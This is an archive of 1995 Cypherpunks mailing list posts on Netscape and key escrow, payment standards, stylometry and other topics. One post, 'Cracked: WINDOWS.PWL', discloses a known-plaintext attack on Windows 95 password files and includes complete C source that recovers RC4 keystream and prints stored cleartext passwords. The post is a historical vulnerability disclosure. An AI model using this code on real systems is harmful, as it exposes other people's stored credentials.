> Random doesn't care, then it doesn't matter too much what you or me
> can say. 

Uh... read the above again real carefully.  Think real hard about what 
you have said.

> Nor would it be correct that we imposed our view to the
> majority of Joes.

Isn't that what happens every day?  Or did something go anarchy while I 
wasn't watching?

> 
> ...
> >Your information cost is lower by a factor of 100 or more.  Putting the 
> >burden on our shoulders, and then couching it in terms of the cypherpunks 
> >being negative, when indeed we are merely pointing out to whoever will 
> >listen that a spineless money decision has been made, is the center of 
> >hyprocracy.  It sickens me.
> 
> 	Again, I'm not Netscape. So, don't tell *me*. If it sickens you
> the position of anyone, I'm sorry. It may sicken me too, but I don't
> think that only will change how things are (sic).
> ...
> >As does this psycho-babble trash.
> 
> 	It may be trash. But it works. Sorry if you don't like it, but
> that's how humans are.

And this is what I am talking about.  Statements from Netscape and her 
employees are beginning to look more and more like mere fluff, lies, and 
time-buyers based on the belief that this kind of psycho babble is the 
way to conduct your affairs.

> >So when pinto's explode, I might as well just advertize hondas as a 
> >'better value' and not mention the rather glaring fault in the competing 
> >product?
> 
> 	Well, that -as I said- may depend on where you are. In some
> countries you could sue them, but you could not *say* they are bad.
> Odd, isn't it? But so it is.

I know of no country that forbids private parties (cypherpunks list) from 
pointing out flaws and concerns with a product.  (accepting of course 
those countries which lack the basic free speech, or where the government 
owned industry is being commented on).  Your complaint about the 
potential liability of such statements was in reference to the 
cypherpunks, or at least a few on the list, being 'negative' about 
Netscape.  A private action for that, when based on fact, isn't 
actionable anywhere I know about.

> >I might add, few cypherpunks (to their great credit) sell their 
> >software.  We are interested in the software being the strongest, and 
> >best quality.
> >
> 	So do I. And that's what I suggested: better alternatives. If
> there are some, then market forces will drive everything to our side.
> Just by making people angry we won't gain much.

Its the angry customer who walks out and takes his consumer cash 
elsewhere.  It amazes me how content everyone is to limit themselves.

> ..
> >You mean to realize that Netscape could care less about the 'educated' 
> >consumer who is displeased with the decision, and instead is following 
> >that large nose which sniffs the waifting scent of green?
> 
> 	Exactly. If you realize that, you know what the problem is. If
> you assume any company has to be bounded by any cypherpunkish ideas,
> which in addition hurt their business, then you are not addressing the
> real problem.

I don't have a problem with the company that is money grubbing until they 
try to convince me that they are not and then fail utterly to back it up.
One might even say that's a form of fraud.

> ...
> >Either support GAK or do not.  Don't give us horseshit about how you 
> >think we are being too hard on Netscape because we are educated 
> >consumers, and because we realize that GAK crypto is not the best product it 
> >could be.
> 
> 	Sorry man, but as soon as Democracy comes in, elites go out the
> window. It's the domain of the common man. If the common man doesn't hold
> with the opinions of the educated man, then the educated man has nothing
> to do.

Except try and educate the common man.  Look like anything that has been 
going on here on the list?  Duh.

> >It is as much our right to gripe and moan about the spineless decision as 
> >it is for you to make it.  To tell us to ignore it is hypocritical in the 
> >extreme.  If your product is so superior, why the hell should you care 
> >about a few cypherpunks moaning about this or that?  Aren't we members of 
> 
> 	You can gripe or moan or do as you wish. So do I, and I chose to
> express my opinion that educating the common man is more effective.

And griping and moaning isn't educating the common man because...?

> 	And once more: it's not my product. I have nothing to do with 
> Netscape. All I want is energies derived into effective courses.

Like sitting on hands.  Like admitting "there is nothing for (us) to do?"

> >Take your emotional censorship elsewhere.  And while your at it, try 
> >making a superior product to please us, rather than some high-school 
> >textbook psycho-babble about saying only nice things to the other 
> >children in the sandbox.
> 
> 	I fear it is you who's becoming emotional and censoring. I didn't
> tell anybody to take his/her opinions anywhere else.
 I'm only exposing what
> my opinion is on how cryptography should be promoted and what is the
> -in my humble opinion- best course of action.
> 
> 	As for "children in the sandbox"... it also seems I have some more
> respect for those "Joe Random"s than you do. And even if they are so, I
> prefer to take them into adulthood rather than keeping crypto priesthood
> to myself and pontificing them what they should do relying on me.

I'd be happy if Joe Random became Joe Crypto.  Unlike you, I just don't 
assume that it has already happened.

> 
> 				jr
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 4 Dec 95 13:29:39 PST
To: sameer@c2.org
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
Message-ID: <9512042126.AA25932@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> 	It doesn't appear that these people seem to care about
> cash-like anonymous token-based payment schemes. Is that a valid
> assesment? What is needed to make these people start caring about
> that?

I didn't go to the meeting.  On the other hand, I notice Cybercash people
in influential positions on the comittee.  I'd also contact
> > From: "Debbie O'Dell" <dlo@dsunix2.dsrd.ornl.gov>
> > To: Electronic Commerce Working Group Reflector <fstc-ecomm@monroe.llnl.gov>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Mon, 4 Dec 95 16:34:46 PST
To: cypherpunks@toad.com
Subject: Stylometry
Message-ID: <199512050028.QAA04676@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain



I recently came across an interesting book.  Detailed information follows.
It would seem (to me) to have interesting implications for anonymous
remailers.

Does anyone on the list have any knowledge of this subject?  I've seen
it hinted at, but never systematically explored.

In particular, does anyone know how it has advanced since the book was
written (1978)?  Additional references?

Dana W. Albrecht
dwa@corsair.com


------------------------------------------------------------------------------

Morton, A. Q. (Andrew Queen)
  Literary detection : how to prove authorship and fraud in literature and doc
uments / A. Q. Morton.  [Epping, Eng.] : Bowker, c1978.  xiii, 221 p. ; 25 cm.
 
LC CALL NUMBER: PN171.F6 M64
 
SUBJECTS:
  Authorship, Disputed.
  Language and languages--Style.
  Linguistics--Statistical methods.
 
DEWEY DEC:  801/.959
 
NOTES:
  Includes index.
  Bibliography: p. 221.
 
ISBN:  0859350622 : L10.50
LCCN:  79-310591 r85

------------------------------------------------------------------------------

Contents

    List of Tables                                                      vii
    List of Figures                                                     xi
    Preface                                                             xiii

SECTION I    THE THEORY OF STYLOMETRY

    1.  The Problems of Identification and Recognition                    3
    2.  The First Steps                                                  19
    3.  Statistics and Stylometry                                        29
    4.  Statistics as Description                                        40
    5.  The Second Stage in Statistical Description                      51
    6.  Like or Unlike?  The Statistics of Comparisons                   71
    7.  The Rules of the Game                                            75

SECTION II   THE FEATURES OF LANGUAGE
             WHICH ARE OF PARTICULAR
             INTEREST IN STYLOMETRY

    8.  The Writer in his Works                                          95
    9.  The Inflected Language                                          108
          (i) Positional Measurements and Word Mobility                 109
         (ii) Isotropic Distributions                                   114
        (iii) Anistropic Distributions                                  121
   10.  The Uninflected Language                                        130
   11.  The Occurrence of Proportional Word Pairs                       147

SECTION III  APPLICATIONS

   12.  Introductory                                                    153
   13.  The Homeric Problem                                             158
   14.  The Authorship of the Pauline Epistles                          165
   15.  The Shakespeare Problems                                        184
   16.  The Inimitable Jane                                             189
   17.  A Word from Baker Street                                        192
   18.  Let Justice be Done                                             195

   CONCLUSION                                                           208

   Appendix                                                             211
   Glossary                                                             215
   Bibliography                                                         221
   Index                                                                223

------------------------------------------------------------------------------

(From page 7)

   The main subject of this book is one special aspect of identification,
the determination of the authorship of texts.  Since the development of
photography it has been a simple matter to determine who wrote or who
typed out a text.  It is even possible to demonstrate which instrument was
used in the writing or typing.  But such physical comparisons do not
indicate who composed the text or altered it from its original form.  To
enable this to be done a descriptive science known as stylometry is
needed.  Stylometry is the science which describes and measures the
personal elements in literary or extempore utterances, so that it can be
said that one particular person is responsible for the composition rather
than any other person who might have been speaking or writing at that
time on the same subject for similar reasons.  Stylometry deals not with
the meaning of what is said or written but how it is being said or written.
Stylometry does not deal with the evidential value of statements.  It does
not asked whether this or that particular statement is true or reasonable,
but applies itself to the question, 'In whose words are these sentiments
expressed?'

------------------------------------------------------------------------------

Conclusion

Looking back, the development of stylometry is easy to see. De
Morgan was the first to point out the pattern of argument which should
be used in stylometry, statistics would describe samples and sampling
differences would become the measure of similarity or difference.  But to
suggest that something might well be true and to show that is is true are
two different propositions and it was a long time before anyone actually
developed a statistical test of authorship.  It should have been done by
Udny Yule in his book, _The Statistical Study of Literary Vocabulary_,
but he made an unfortunate error in calculating the standard errors of
sentence length distributions with the result that it was not until W.C.
Wake corrected the error and continued his study of sentence length
distributions of Greek authors in 1946 and 1957 that a reliable test was
established.
   With the pattern of argument confirmed, attention then turned to
what should be counted and analysed.  Like all his colleagues, the author
spent some time looking at those features of style which literary critics
had noted and used as the basis for their judgements.  This was making
stylometry the conversion of stylistic description into quantitative terms;
it was using the accumulated experience of scholars as it had been
expressed in traditional forms.  This proved to be an unexciting quest.  In
some cases, for example the suggestion of Sir Kenneth Dover that the
number of finite verbs used by a writer of Greek prose might be an
indicator of authorship, it turned out to be valid but required samples
impracticably large for any New Testament application, and in others it
soon became clear that the observations had no firm foundation in any
objective data.  It was the realisation that in Greek writing position was
of prime importance that gave stylometry its first general theory.  That such
a theory was justified was confirmed when a dramatic plea for help with a
police statement written in modern English posed a problem which was
rapidly solved by an adaptation of positional methods to the constraints
of an uninflected language.  In Greek where word movement is free, look
at word movement and position; in English where word movement is
restricted, look at immediate context.
   There is so much material available that routine applications of
stylometry will present few problems.  What remain intractable are
problems of mixed tests where one writer has been revised by another or
other situations in which the homogeneity of the text is in doubt.
   Immediate progress seems likely to be made in two directions.  Both
concern the efficiency of methods rather than the further development of
methods.  A simple way to increase the separation of two authors is to
combine a number of tests in multi-variate statistics.  Properly done this
will generate figures which show vast differences where such exist,
although the differences are diffused throughout a number of statistics
and are nowhere to be seen as clearly as the measure of their combined
effect.
   The difficulty is that multi-variate statistics can conceal the underlying
features and in some instances lead to confusion or misapprehension.
One such set of statistics showed the differences between brands of
cigarettes and showed very large differences.  But a study of the statistics
which were combined in the analysis revealed that the largest differences
concerned the packing and the printing on the packets.  While this might
be useful for anyone designing a machine to select brands and sort them
automatically, it was much less useful for any smoker who wanted to know
about the quality of the cigarette.
   The other development which is easy to forecast is the formation of
profiles of individual writers so that quick reference and resolution of
problems will be possible.  One way of doing this is to start with a set of
collocations.  It might be that after "and" a writer is very fond of using "the"
and hardly ever uses "so."  This can be made a test of how often "the" after "and"
occurs compared to "so" after "and".  The combination of a few such tests
based upon the personal maxima and minima of an author will soon
provide a measure by which he can be detected in a large number of
candidates.
  The ultimate aim has been set by the information theory experts who,
many years ago, calculated that in any 200 words, written or spoken,
there was enough information to enable their author to be picked out of
the human race.  This is like saying that every cubic mile of sea water
contains twenty tons of gold; it may be there but getting it out is not easy.
But the aim must be to be able to say of any couple of hundred words, it is
or is not the sole production of the person who produced this other
sample.  It may seem that we are a long way from being able to do so, but
how much nearer we have come in the last twenty years.  Who will say
that the next twenty years will not produce the desired result?

------------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 4 Dec 95 13:34:44 PST
To: cypherpunks@toad.com
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
Message-ID: <v02120d09ace90e1bce3b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>        It doesn't appear that these people seem to care about
>cash-like anonymous token-based payment schemes. Is that a valid
>assesment? What is needed to make these people start caring about
>that?

My guess is, they won't. Ever.

<Elmer Gantry Mode On>
We're looking right into the maw of the beast, here, folks. This is how
book-entry systems want to rule the world. It seems to me that all this
X.BlaBla stuff is about interlocking directories, offsetting book-entries
and audit trails back to the flood, so that if you break a trade, much less
evade taxes or engage in other horsemanlike behavior, they can sic the
Lawfully Deputed Authorities to slam you in the pokey.
<Elmer Gantry Mode Off>

Code words for this bunch include "non-repudiation", "Certification
Authorities", "X.Whatever", and of course "information infrastructure", and
is done usually in concert with, well, lawyers.

Michael Froomkin has had some experience with these types already this
month, and my anonmyous informant, "Erwin Corey" , the world's foremost
authority, is in the thick of these things.

I just got some mail from someone over at bnn who gave me the following
argument, just to show how they think:

1. If we use internet-level (ISP) or link-level (SSL,etc) strong
cryptography, governments can't keep an eye on the 4 horsemen, who would
then rule the world, and the government needs to save us from that.

2. If we just use encryption for the "little" stuff, like credit card
numbers, and signatures, and wire authorization codes, and the like, the
Powers that Be will let us play with money on the internet.

3.  So, go back to your sandbox boy, and let the adults get on with the
Important Stuff, okay?

Actually, argument #3 is implicit in all of this, but that's okay. Here's why.

As one cursed with hyper-analogizing the universe, I see the X.whatever
crowd as centralized surface transport, viz: Railroads and Ships. We're in
the car and plane business, point-to-point, autonomously operated by the
users of the technology for whatever they want to do.

The time is, say, 1910. They look up in the sky at the airplanes rattling
around, or they jump out of the way of a Model T clattering down the
street, and they mutter, "let the adults get on with the Important Stuff".
Cool.

What they really don't understand is that the internal combustion engine of
internetwork commerce, digital bearer certificate technology, is about to
rock their world.

The thing I hear over and over from these people is, "We just want to map
all this great experience we have with the Law of Commerce onto the
Information Superhighway, so we won't have to reinvent the wheel."  They
can't understand why *anyone* would want to remain anonymous. They can't
imagine the benefits of uncontrolled autonomous agents, buying or selling
things, (including themselves) in a global ecology of networks and silicon.

Just like the transportation magnates of the turn of the century couldn't
understand why someone wouldn't use a steam engine, because they're much
more efficient thermodynamically than any internal combustion engine could
ever be. The technology lends itself to economies of scale, and, well, it's
lest wasteful that way. This is why J.Pierpont Morgan made a fortune
consolidating railroads and steel companies.

These people are just victims of their own success, really. They are the
end products of years of meritocratic selection, schooling, and
certification.  They have been practically bred to inhabit the top of
hierarchies.

So, when they look at the internet, they can see nothing else but what they
know. They see something like digital cash an anomaly, an error in the
data, because even with a completely on-line system and Mark Twain Bank
walking very gingerly on the thin ice of new economic technology, MTB's
cost on a Digicash trade is $.50, while the most efficient book-entry
system on the net, First Virtual, has to charge, what? $5.00 to break even?
Wait until we can actually trust off-line payment schemes for *really*
small stuff, and get profits from issuing nano-money.

They don't get it. The network isn't a hierarchy. The network is a
geodesic. You don't need offsetting book entries, you can trade digital
certificates much cheaper. You don't need to control your software, you
need to make it autonomous and set it free.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 4 Dec 95 07:41:16 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512041541.QAA26295@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by anonymous-remailer@shell.portal.com () on 
Mon, 4 Dec  1:42 AM

>That authority now sits in other hands.  In silicon.
>
>I doubt the President wants a market meltdown as we 
>start to move  towards an election year.  Body bags and 
>a bad economic front are a  bad mix and could swing the 
>whole election with the dual near unsurmountable 
>election obstacles.
>
>Hopefully, god-willing, we won't face any tragedies.

-----

Financial Times, Dec 4, 1995

US Marine chiefs trade places to experience tranche warfare

Officers are preparing to do virtual battle in the Nymex oil
pits [and wargame FinCide]

By Laurie Morse

A dozen US Marine Corps generals and colonels will today march
on to the New York Mercantile Exchange trading floor and start
matching wits with commodity futures traders.

The traders often describe their fraught existence in the
trading rings as virtual warfare, and the US military appears
to agree.

Keen to find ways of training officers to cope with the
demands of high-tech 21st-century warfare, a group of Marine
Corps top brass will venture into the Nymex crude oil pit in
the World Trade Center after the regular market has closed.

Assisted by a group of handpicked veteran commodity traders,
the marines will plunge into a simulated session of futures
trading that will include several market reversals and a
barrage of oil-linked "news".

Mr Gary Lapayover, the Nymex trader co-ordinating the event,
says the trading session will allow the officers and traders
to become acquainted on friendly turf, and give the Marines a
glimpse of the multiple tasks and the speed -- that breakneck
trading entails.

Today's simulated trading will be followed tomorrow by a war
games session. About 15 traders will follow the generals to an
old officers' club on Governor's Island, off Manhattan, and
test their skills in a computerised game designed by Gama
Corp. a Virginia-based company that specialises in
computer-generated battle scenarios.

Later, the traders will tell the officers and their aides what
they think of the battle experience.

What do the Marines hope to learn from the commodities pits?
"Our vision of what warfare will be in the 21st century is
very different from what we've faced in the 20th," says
Colonel Tom Harkins, director of operations at the Marines'
war-fighting laboratory in Quantico, Virginia.

In future, the Marines expect to be drawn into smaller
conflicts of the type seen in Somalia and Bosnia. At the same
time, warfare will become increasingly digitalised, calling
for rapid decision-taking amid a barrage of information.
"How does a commander make decisions on a digital
battlefield?" asks Col Harkins. "Technology will increase the
tempo of battle, and the influx of digital information will
require skills in what you might call pattern analysis. This
is what futures traders do. In this exercise we want to see
how people who face these conditions every day deal with the
stress, and get comfortable with the risks."

During tomorrow's war games, traders will be confronted by an
on-screen battle area laid out on a grid, with as many as 50
small teams of cyber-soldiers seeking the "enemy".

Once "contact" is made, the teams will request firepower.
Under pressure, "commanders" must decide how to deploy
resources to the best strategic advantage, while limiting
losses.

For Mr Eric Bolling, an independent trader who has survived
nine years in the Nymex energy pits, the Marines are being
shrewd in seeking to cross laser-swords with battle-hardened
heroes of the trading pits.

Mr Bolling, a 33-year-old former minor league baseball player,
has no military background, but sees a lot of parallels
between trading, sport and the armed services. All three
require high levels of self-motivation and decision-making
ability.

Some of the generals and colonels may be shown to be more
suited to high-stress, high-stakes environments than others,
he says. "You have to be able to prioritise and analyse a lot
of information rapidly -- then initiate risk by making a
decision; and, finally, manage that risk by having the
discipline to manage the trade," says Mr Bolling.

"A lot of people can't do that, and wash out of these markets.
I don't think it's something that can be learned really --
it's a personality type."

Mr Lapayover said he selected floor veterans like Mr Bolling
to participate because he was looking for "survivors" people
who have been successful traders over a number of years.
"Military experience wasn't a factor. The Marines are looking
for people that can help them understand the process."

Mr Lapayover has also suggested that the top brass visit the
"war rooms" of America's largest investment banks to observe
Wall Street's fixed income and equities traders, and the
strategies of high-stakes corporate raiders.

The war games are part of a new programme directed by General
Charles Krulak, commandant of the Marine Corps.

"War games are not designed to give you a total solution, they
are designed to give you insight" he says. "We're going to
have our laboratory analysts with us, and they will be looking
at improving the process."

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 4 Dec 95 14:58:50 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.SUN.3.91.951204160720.14502A-100000@polaris.mindport.net>
Message-ID: <199512042259.RAA08133@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn writes:
>I am most distressed because of what I see as a snowjob.
>
>"We are anti-GAK"
>
>Great, tell me what you have done to prevent GAK from proliferating.

This is a poor argument.

I'd consider myself "anti-war", though I've done nothing more than
argue against it and behave peacefully myself.  I've even heard
"pro-war" arguments and considered some of them valid, though not
enough to change my opinion.

Netscape has pretty clearly said that they don't like the idea of GAK,
and that in fora where such things are discussed, they'll argue against
it.  They've also said that they won't let mandatory GAK put them out
of business.  That *doesn't* make them pro-GAK.

Jim Clark hasn't made any statements to the effect that *Netscape*
supports GAK (quite the contrary), but he *has* noted the government
position --- "GAK is necessary for law enforcement".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 4 Dec 95 17:25:55 PST
To: cypherpunks@toad.com
Subject: NSA Frisbee [EXTREMELY FRIVOLOUS]
Message-ID: <v02120d02ace940b4939e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Mike Bakkes, who is on the EC board, recently brought in
an NSA flying disk. A .gif of it is available at:

http://www.communities.com/foo/NSAfris.gif

We are currently looking for a source of these; we will
be calling the number listed on the disk itself tomorrow
during normal office hours in MD.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ROCK.CNB.UAM.ES
Date: Mon, 4 Dec 95 07:21:26 PST
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <951204173237.20a03d03@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@polaris.mindport.net> wrote
>On Fri, 1 Dec 1995 JR@ns.cnb.uam.es wrote:
>
>> From:	SMTP%"tcmay@got.net"  1-DEC-1995 12:26:55.99
>
...
>
>You need to think real hard about how likely foreign customers on a scale 
>as large as the U.S. government are going to be attracted to a product 
>that forfeits its keys to the U.S. government.  Consider this problem 
>again in light of all the hand waving about the U.S. intelligence 
>agencies and industrial espionage/intelligence.

	I do, and I reckon most people, at this level now, worry more
about how nice pages look than their security. Mostly because there is
comparatively little interest yet. That's the whole issue: a company that
is aware of that and wants to be the first at occupying the market will
give security a second priority level -as most users do-. Look e.g. at
any OS and how secure it is...

	I'm not defending Netscape, I argue about the reasons that drive
the market and most companies -Netscape among them-.

> 
>Let's put this example in a more personal context, with you as the 
>netscape guru.  In fact, let us carry that assumption along, as really 
>I'm talking to the netscape insiders to begin with.

	Please, not that I have no liaison to Netscape. But I don't like all
this broohaha about whether this or that guy is evil because s/he does/
doesn't hold with some principles/ends.

	If one wants to be effective, one needs to understand the other
side's point of view, so as to be able to develop coherent strategies that
work.

	Independently of what *my* personal convictions are -which I
have never stated-, you can't forget that not everybody holds to your
same ethics or needs to.

...
>
>Your faith in Joe Random vastly exceeds mine.

	So it seems. Anyway, that's the only resource we have. If Joe
Random doesn't care, then it doesn't matter too much what you or me
can say. Nor would it be correct that we imposed our view to the
majority of Joes.


...
>Your information cost is lower by a factor of 100 or more.  Putting the 
>burden on our shoulders, and then couching it in terms of the cypherpunks 
>being negative, when indeed we are merely pointing out to whoever will 
>listen that a spineless money decision has been made, is the center of 
>hyprocracy.  It sickens me.

	Again, I'm not Netscape. So, don't tell *me*. If it sickens you
the position of anyone, I'm sorry. It may sicken me too, but I don't
think that only will change how things are (sic).

...
>As does this psycho-babble trash.

	It may be trash. But it works. Sorry if you don't like it, but
that's how humans are.

>So when pinto's explode, I might as well just advertize hondas as a 
>'better value' and not mention the rather glaring fault in the competing 
>product?

	Well, that -as I said- may depend on where you are. In some
countries you could sue them, but you could not *say* they are bad.
Odd, isn't it? But so it is.

>I might add, few cypherpunks (to their great credit) sell their 
>software.  We are interested in the software being the strongest, and 
>best quality.
>
	So do I. And that's what I suggested: better alternatives. If
there are some, then market forces will drive everything to our side.
Just by making people angry we won't gain much.

..
>You mean to realize that Netscape could care less about the 'educated' 
>consumer who is displeased with the decision, and instead is following 
>that large nose which sniffs the waifting scent of green?

	Exactly. If you realize that, you know what the problem is. If
you assume any company has to be bounded by any cypherpunkish ideas,
which in addition hurt their business, then you are not addressing the
real problem.

...
>Either support GAK or do not.  Don't give us horseshit about how you 
>think we are being too hard on Netscape because we are educated 
>consumers, and because we realize that GAK crypto is not the best product it 
>could be.

	Sorry man, but as soon as Democracy comes in, elites go out the
window. It's the domain of the common man. If the common man doesn't hold
with the opinions of the educated man, then the educated man has nothing
to do.

>It is as much our right to gripe and moan about the spineless decision as 
>it is for you to make it.  To tell us to ignore it is hypocritical in the 
>extreme.  If your product is so superior, why the hell should you care 
>about a few cypherpunks moaning about this or that?  Aren't we members of 

	You can gripe or moan or do as you wish. So do I, and I chose to
express my opinion that educating the common man is more effective.

	And once more: it's not my product. I have nothing to do with 
Netscape. All I want is energies derived into effective courses.

>Take your emotional censorship elsewhere.  And while your at it, try 
>making a superior product to please us, rather than some high-school 
>textbook psycho-babble about saying only nice things to the other 
>children in the sandbox.

	I fear it is you who's becoming emotional and censoring. I didn't
tell anybody to take his/her opinions anywhere else. I'm only exposing what
my opinion is on how cryptography should be promoted and what is the
-in my humble opinion- best course of action.

	As for "children in the sandbox"... it also seems I have some more
respect for those "Joe Random"s than you do. And even if they are so, I
prefer to take them into adulthood rather than keeping crypto priesthood
to myself and pontificing them what they should do relying on me.

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Andrew Stevenson <frank@funcom.no>
Date: Mon, 4 Dec 95 08:52:01 PST
To: cypherpunks@toad.com
Subject: Cracked: WINDOWS.PWL
Message-ID: <Pine.SGI.3.91.951204174641.2847A-100000@odin>
MIME-Version: 1.0
Content-Type: text/plain


A few days ago Peter Gutmann posted a description on how
Windows 95 produces RC4 keys of 32 bits size to protect
the .pwl files. I verified the information and wrote a
program to decrypt .pwl files with a known password, I then
discovered that the .pwl files where well suited for a known
plaintext attack as the 20 first bytes are completely predictable.

The 20 first bytes of any .pwl files contains the username, which
is the same as the filename, in capitals, padded with 0x00. From then
I wrote a program to bruteforce the .pwl file and optimized it
so it would run in less than 24 hours on an SGI. I run a test
of the bruter software and recovered an unknown rc4 key in 8 hours,
but the decrypted file was still largely uninteligeble, I then proceeded
to decrypt the file at all possible starting points, and discovered
valuable information (cleartext passwords) offset in the file.

This has enormous implications: RC4 is a stream cipher, it
generates a long pseudo random stream that it uses to XOR the
data byte by byte. This isn't neccecaraly weak encryption if you
don't use the same stream twice: however WIN95 does, every resource is
XORed with the same pseudo random stream. What's more the 20
first bytes are easy to guess. This is easy to exploit:
XOR the 20 bytes starting at position 0x208 with the user name
in uppercase, and slide this string through the rest of the file
(xoring it with whatever is there) this reveals the 20
first bytes of the different resources.

From there I went on to study the structure of the .pwl file it is
something like this (decrypted):

USERNAME.........wpwpwpwpwpwpwpwpwpwp
rs???????
rs
rs
rs???????????
rs???????

where wp is i word pointer to the different resources (from start
of pwl file) The 2 first bytes of the resource (rs) is its length in bytes
(of course XOR with RC4 output) It is the fairly easy to find all the
resource pointers by jumping from start of resource to next resource,
had it not been for the fact that the size sometimes is incorrect
(courtesy of M$)

What follows is a short c program that tries to remedy this and
reconstruct the pointertable thus generating at least 54 bytes of the RC4
pseudorandom stream, and then proceedes to decrypt as much as possible from
the different resources.

What does this show? Although RC4 is a fairly strong cipher, it has the
same limitations as any XOR streamcipher, and implementing it without
sufficient knowledge can have dire consequences. I strongly suggest that
the programmers at Microsoft do their homework before trying anything like
this again! 


 
DISCLAIMER:
This is a quick hack, I don't make any claims about usefulness for
any purpose, nor do I take responsibility for use nor consequences of
use of the software. FUNCOM of Norway is not responsible for any of this,
(I speak for myself, and let others speak for themselves)

This source is hereby placed in the public domain, please
improve if you can.

--- glide.c ---

#include <stdio.h>
#include <string.h>


unsigned char Data[100001];
unsigned char keystream[1001];
int Rpoint[300];


main (int argc,char *argv[]) {
	FILE *fd;
	int 	i,j,k;
	int	size;
	char ch;
	char *name;
	int cracked;
	int sizemask;
	int maxr;
	int rsz;
	int pos;
	int Rall[300]; /* resource allocation table */


	if (argc<2) {
		printf("usage: glide filename (username)");
		exit(1);
	}
	
	/* read PWL file */

	fd=fopen(argv[1],"rb");
	if(fd==NULL) {
		printf("can't open file %s",argv[2]);
		exit(1);
	}
	size=0;
	while(!feof(fd)) {
		Data[size++]=fgetc(fd);
	}
	size--;
	fclose(fd);

	/* find username */
	name=argv[1];
	if(argc>2) name=argv[2];
	printf("Username: %s\n",name);

	/* copy encrypted text into keystream */
	cracked=size-0x0208;
	if(cracked<0) cracked=0;
	if(cracked>1000) cracked=1000;
	memcpy(keystream,Data+0x208,cracked );

	/* generate 20 bytes of keystream */
	for(i=0;i<20;i++) {
		ch=toupper(name[i]);
		if(ch==0) break;
		if(ch=='.') break;
		keystream[i]^=ch;		
	};
	cracked=20;


	/* find allocated resources */

	sizemask=keystream[0]+(keystream[1]<<8);
	printf("Sizemask: %04X\n",sizemask);

	for(i=0;i<256;i++) Rall[i]=0;

	maxr=0;
	for(i=0x108;i<0x208;i++) {
		if(Data[i]!=0xff) {
			Rall[Data[i]]++;
			if (Data[i]>maxr) maxr=Data[i];
		}
	}
	maxr=(((maxr/16)+1)*16);	/* resource pointer table size appears to be divisible by 16 */

	/* search after resources */

	Rpoint[0]=0x0208+2*maxr+20+2;	/* first resource */
	for(i=0;i<maxr;i++) {
		/* find size of current resource */
		pos=Rpoint[i];
		rsz=Data[pos]+(Data[pos+1]<<8);
		rsz^=sizemask;
		printf("Analyzing block with size: %04x\t(%d:%d)\n",rsz,i,Rall[i]);
		if( (Rall[i]==0) && (rsz!=0) ) {
			printf("unused resource has nonzero size !!!\n");
			exit(0);
		}

		pos+=rsz;

		/* Resources have a tendency to have the wrong size for some reason */
		/* check for correct size */

		if(i<maxr-1) {
			while(Data[pos+3]!=keystream[1]) {
				printf(":(%02x)",Data[pos+3]);
				pos+=2; /* very rude may fail */
			}
		}

		pos+=2;	/* include pointer in size */
		Rpoint[i+1]=pos;
	}
	Rpoint[maxr]=size;

	/* insert Table data into keystream */
	for(i=0;i <= maxr;i++) {
		keystream[20+2*i]^=Rpoint[i] & 0x00ff;
		keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;
	}
	cracked+=maxr*2+2;	

	printf("%d bytes of keystream recovered\n",cracked);

	/* decrypt resources */
	for(i=0;i < maxr;i++) {
		rsz=Rpoint[i+1]-Rpoint[i];
		if (rsz>cracked) rsz=cracked;
		printf("Resource[%d] (%d)\n",i,rsz);
		for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);
		printf("\n");
	}


	exit(0);	
}

--- end ---


#include <std/disclaimer.h> 
E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for key






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Mon, 4 Dec 95 14:54:48 PST
To: cypherpunks@toad.com
Subject: Re: Questions/Comments on ecash protocol (fwd)
In-Reply-To: <v02120d00ace710acf043@[192.0.2.1]>
Message-ID: <49vu6v$j0j@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02120d00ace710acf043@[192.0.2.1]>,
